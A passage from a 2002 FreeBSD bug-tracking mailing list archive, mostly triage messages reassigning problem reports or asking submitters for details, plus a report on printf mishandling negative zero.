Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: deprecated test(1) options in src/include/Makefile Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 10:27:52 PDT 2002 Responsible-Changed-Why: Ruslan, can you please have a look at this and also the bsd.obj.mk part of PR 38724. http://www.freebsd.org/cgi/query-pr.cgi?pr=40846 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 10:42:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7B5F437B400 for ; Tue, 20 Aug 2002 10:42:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD77543E84 for ; Tue, 20 Aug 2002 10:42:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KHfvJU080994 for ; Tue, 20 Aug 2002 10:41:57 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KHffec080988; Tue, 20 Aug 2002 10:41:41 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D45937B400 for ; Tue, 20 Aug 2002 10:32:56 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F70143E42 for ; Tue, 20 Aug 2002 10:32:56 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KHWtOT034153 for ; Tue, 20 Aug 2002 10:32:55 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7KHWtKV034152; Tue, 20 Aug 2002 10:32:55 -0700 (PDT) Message-Id: <200208201732.g7KHWtKV034152@www.freebsd.org> Date: Tue, 20 Aug 2002 10:32:55 -0700 (PDT) From: GOTO Kentaro To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/41823: printf("%+f\n", -0.0) generates +0.000000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41823 >Category: bin >Synopsis: printf("%+f\n", -0.0) generates +0.000000 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 10:40:28 PDT 2002 >Closed-Date: >Last-Modified: >Originator: GOTO Kentaro >Release: STABLE and CURRENT >Organization: >Environment: FreeBSD 5.0-CURRENT i386 >Description: vfprintf() generates a wrong "+" sign for a floating point number minus zero, i.e., -0.0, when +[eEfgG] is specified in the format. >How-To-Repeat: % echo 'main(){printf("%+f\\n", -0.0);}' | /usr/bin/cc -xc - && ./a.out +0.000000 >Fix: How about Checking sign bit instead of `< 0'. For example, NetBSD's /usr/src/lib/libc/stdio/vfprintf.c:cvt() does digits = __dtoa(value, mode, ndigits, decpt, &dsgn, &rve); if (dsgn) { value = -value; *sign = '-'; } else *sign = '\000'; But FreeBSD's does if (value < 0) { value = -value; *sign = '-'; } else *sign = '\000'; This test does not work in this case because IEEE754 defines the truth value of -ZERO < ZERO as FALSE. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 10:59:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B6C5237B400; Tue, 20 Aug 2002 10:59:10 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5477143E4A; Tue, 20 Aug 2002 10:59:10 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KHxAJU084306; Tue, 20 Aug 2002 10:59:10 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KHxAil084302; Tue, 20 Aug 2002 10:59:10 -0700 (PDT) Date: Tue, 20 Aug 2002 10:59:10 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201759.g7KHxAil084302@freefall.freebsd.org> To: trevor@FreeBSD.org, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/40047: "make release" fails in games/adventure (yesterday's RELENG_4) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: "make release" fails in games/adventure (yesterday's RELENG_4) State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Tue Aug 20 10:57:45 PDT 2002 State-Changed-Why: According to the audit-trail this was a user error. Ruslans suggested change for the RELENG_4_6 branch has also been committed. http://www.freebsd.org/cgi/query-pr.cgi?pr=40047 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11: 9: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6388E37B401; Tue, 20 Aug 2002 11:09:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 14B8B43E65; Tue, 20 Aug 2002 11:09:06 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KI95JU090177; Tue, 20 Aug 2002 11:09:05 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KI95XC090173; Tue, 20 Aug 2002 11:09:05 -0700 (PDT) Date: Tue, 20 Aug 2002 11:09:05 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201809.g7KI95XC090173@freefall.freebsd.org> To: sven@jti.ee, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/39229: instruction pointer = 0x8:0xc00eaf13 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: instruction pointer = 0x8:0xc00eaf13 State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:04:17 PDT 2002 State-Changed-Why: Can you please provide the information needed to help you with this. See that handbook page that you refer to in the PR: http://www.ee.freebsd.org/doc/en_US.ISO8859-1/books/faq/advanced.html#KERNEL-PANIC-TROUBLESHOOTING You might also want to try 4.6.2-Release. Also you mention wd0 as disk please make sure that you are actually using ad0. Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. http://www.freebsd.org/cgi/query-pr.cgi?pr=39229 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:13:45 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 469F237B400; Tue, 20 Aug 2002 11:13:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E4E6B43E6E; Tue, 20 Aug 2002 11:13:42 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIDgJU091695; Tue, 20 Aug 2002 11:13:42 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIDgP9091691; Tue, 20 Aug 2002 11:13:42 -0700 (PDT) Date: Tue, 20 Aug 2002 11:13:42 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201813.g7KIDgP9091691@freefall.freebsd.org> To: olli@secnetix.de, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-qa@FreeBSD.org Subject: Re: misc/38835: sysinstall always installs crypto Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sysinstall always installs crypto State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:10:54 PDT 2002 State-Changed-Why: Did you try selecting only the bin dist in the costum menu? Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. Responsible-Changed-From-To: freebsd-bugs->freebsd-qa Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:10:54 PDT 2002 Responsible-Changed-Why: Over to sysinstall maintainers. http://www.freebsd.org/cgi/query-pr.cgi?pr=38835 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:27:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D528037B400; Tue, 20 Aug 2002 11:27:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 85F5A43E81; Tue, 20 Aug 2002 11:27:11 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIRBJU093595; Tue, 20 Aug 2002 11:27:11 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIR8QQ093585; Tue, 20 Aug 2002 11:27:08 -0700 (PDT) Date: Tue, 20 Aug 2002 11:27:08 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201827.g7KIR8QQ093585@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/38923: Incorrect device use count prevents door locking Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Incorrect device use count prevents door locking Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:25:44 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. This one has an analysis and a patch from bde. http://www.freebsd.org/cgi/query-pr.cgi?pr=38923 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:30:46 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2E23737B400; Tue, 20 Aug 2002 11:30:45 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D2B4043E70; Tue, 20 Aug 2002 11:30:44 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIUiJU093912; Tue, 20 Aug 2002 11:30:44 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIUESM093868; Tue, 20 Aug 2002 11:30:14 -0700 (PDT) Date: Tue, 20 Aug 2002 11:30:14 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201830.g7KIUESM093868@freefall.freebsd.org> To: erdgeist@erdgeist.org, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: i386/38863: Burning CDs crashes since 4.6stable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Burning CDs crashes since 4.6stable State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:27:43 PDT 2002 State-Changed-Why: Please provide the info Sĝren asked for. Send the file /var/run/dmesg.boot to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:27:43 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=38863 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:32:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A0C837B400; Tue, 20 Aug 2002 11:32:13 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 08A2043E72; Tue, 20 Aug 2002 11:32:13 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIWCJU094628; Tue, 20 Aug 2002 11:32:12 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIW3mE094456; Tue, 20 Aug 2002 11:32:03 -0700 (PDT) Date: Tue, 20 Aug 2002 11:32:03 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208201832.g7KIW3mE094456@freefall.freebsd.org> To: rafaelr@cpd.ufsm.br, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/41818: Problem in make buildworld with 4.6.2 source sinchronized. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Problem in make buildworld with 4.6.2 source sinchronized. State-Changed-From-To: open->feedback State-Changed-By: schweikh State-Changed-When: Tue Aug 20 11:29:17 PDT 2002 State-Changed-Why: Please follow the steps in the handbook, http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/makeworld.html Have you forgotten to run mergemaster to update files in /etc after updating src and prior to making world? http://www.freebsd.org/cgi/query-pr.cgi?pr=41818 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:35: 6 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5D3E437B400; Tue, 20 Aug 2002 11:35:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DDA543E4A; Tue, 20 Aug 2002 11:35:05 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIZ4JU095412; Tue, 20 Aug 2002 11:35:04 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIZ4aw095408; Tue, 20 Aug 2002 11:35:04 -0700 (PDT) Date: Tue, 20 Aug 2002 11:35:04 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201835.g7KIZ4aw095408@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, peter@FreeBSD.org Subject: Re: bin/38765: CVS Daemon Vulnerability in 1.11.1p1 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: CVS Daemon Vulnerability in 1.11.1p1 Responsible-Changed-From-To: freebsd-bugs->peter Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:33:42 PDT 2002 Responsible-Changed-Why: Over to cvs maintainer. Peter, do our cvs version have this problem and is this a good reason to upgrade cvs to the latest release? http://www.freebsd.org/cgi/query-pr.cgi?pr=38765 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:36:55 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 30FBA37B400; Tue, 20 Aug 2002 11:36:54 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D6AE543E3B; Tue, 20 Aug 2002 11:36:53 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIarJU095552; Tue, 20 Aug 2002 11:36:53 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIariH095548; Tue, 20 Aug 2002 11:36:53 -0700 (PDT) Date: Tue, 20 Aug 2002 11:36:53 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201836.g7KIariH095548@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/38333: ATA drives only UDMA33 after APM standby Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ATA drives only UDMA33 after APM standby Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:36:35 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=38333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 11:41:37 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C542037B400; Tue, 20 Aug 2002 11:41:34 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7695A43E72; Tue, 20 Aug 2002 11:41:34 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIfYJU096648; Tue, 20 Aug 2002 11:41:34 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIfYuG096641; Tue, 20 Aug 2002 11:41:34 -0700 (PDT) Date: Tue, 20 Aug 2002 11:41:34 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201841.g7KIfYuG096641@freefall.freebsd.org> To: void@shell.rawbw.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/38373: ipfw-graph reboots compaq 5500r Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ipfw-graph reboots compaq 5500r State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:37:53 PDT 2002 State-Changed-Why: Please follow the instuctions on: http://www.freebsd.org/doc/en_US.ISO8859-1/books/faq/advanced.html#KERNEL-PANIC-TROUBLESHOOTING and provide the information needed to better help you. Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. http://www.freebsd.org/cgi/query-pr.cgi?pr=38373 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:11:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4452037B400; Tue, 20 Aug 2002 12:11:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 753C143EFF; Tue, 20 Aug 2002 11:50:38 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIoSJU097740; Tue, 20 Aug 2002 11:50:28 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIn88W097620; Tue, 20 Aug 2002 11:49:08 -0700 (PDT) Date: Tue, 20 Aug 2002 11:49:08 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201849.g7KIn88W097620@freefall.freebsd.org> To: terry@taipeitimes.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/38458: There is no a file iicbb_if.c on source tree. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: There is no a file iicbb_if.c on source tree. State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:47:56 PDT 2002 State-Changed-Why: Did you try Peters suggestion with a 'make clean' or 'config -r'? Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. http://www.freebsd.org/cgi/query-pr.cgi?pr=38458 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:17:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C5D4B37B4A2; Tue, 20 Aug 2002 12:17:17 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7740443F2F; Tue, 20 Aug 2002 11:55:43 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KItXJU099258; Tue, 20 Aug 2002 11:55:33 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIsDBi099161; Tue, 20 Aug 2002 11:54:13 -0700 (PDT) Date: Tue, 20 Aug 2002 11:54:13 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201854.g7KIsDBi099161@freefall.freebsd.org> To: ah@alvman.Haakh.de, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, gad@FreeBSD.org Subject: Re: kern/38166: ipv6_gateway_enable="YES" breaks lpd Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ipv6_gateway_enable="YES" breaks lpd State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:52:30 PDT 2002 State-Changed-Why: Andreas, did you get this to work yet? Please followup by sending a mail to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. Responsible-Changed-From-To: freebsd-bugs->gad Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:52:30 PDT 2002 Responsible-Changed-Why: Over to lpd maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=38166 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:17:57 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4970537B480; Tue, 20 Aug 2002 12:17:31 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD5A3441AE; Tue, 20 Aug 2002 11:59:37 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KIxRJU099767; Tue, 20 Aug 2002 11:59:27 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KIw7Iq099695; Tue, 20 Aug 2002 11:58:07 -0700 (PDT) Date: Tue, 20 Aug 2002 11:58:07 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201858.g7KIw7Iq099695@freefall.freebsd.org> To: b7506061@csie.ntu.edu.tw, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/38101: ATAPI-CDROM uncontrollable when no disc in it Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ATAPI-CDROM uncontrollable when no disc in it State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Tue Aug 20 11:56:11 PDT 2002 State-Changed-Why: To know which firmware you have, please send the file /var/run/dmesg.boot to freebsd-gnats-submit@FreeBSD.org with the subject of this mail intact. Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 11:56:11 PDT 2002 Responsible-Changed-Why: Over to ATA maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=38101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 12:18:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 67E2037B795; Tue, 20 Aug 2002 12:17:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC0224427D; Tue, 20 Aug 2002 12:04:39 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KJ3wJU002077; Tue, 20 Aug 2002 12:03:58 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KJ3w7T002070; Tue, 20 Aug 2002 12:03:58 -0700 (PDT) Date: Tue, 20 Aug 2002 12:03:58 -0700 (PDT) From: Johan Karlsson Message-Id: <200208201903.g7KJ3w7T002070@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, jhb@FreeBSD.org Subject: Re: misc/37380: boot0 partition list is outdated (patch included) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: boot0 partition list is outdated (patch included) Responsible-Changed-From-To: freebsd-bugs->jhb Responsible-Changed-By: johan Responsible-Changed-When: Tue Aug 20 12:02:20 PDT 2002 Responsible-Changed-Why: John, Robert do not consider himself maintainer anymore. Can you please have a look at this? http://www.freebsd.org/cgi/query-pr.cgi?pr=37380 To Unsubscribe: send mail to 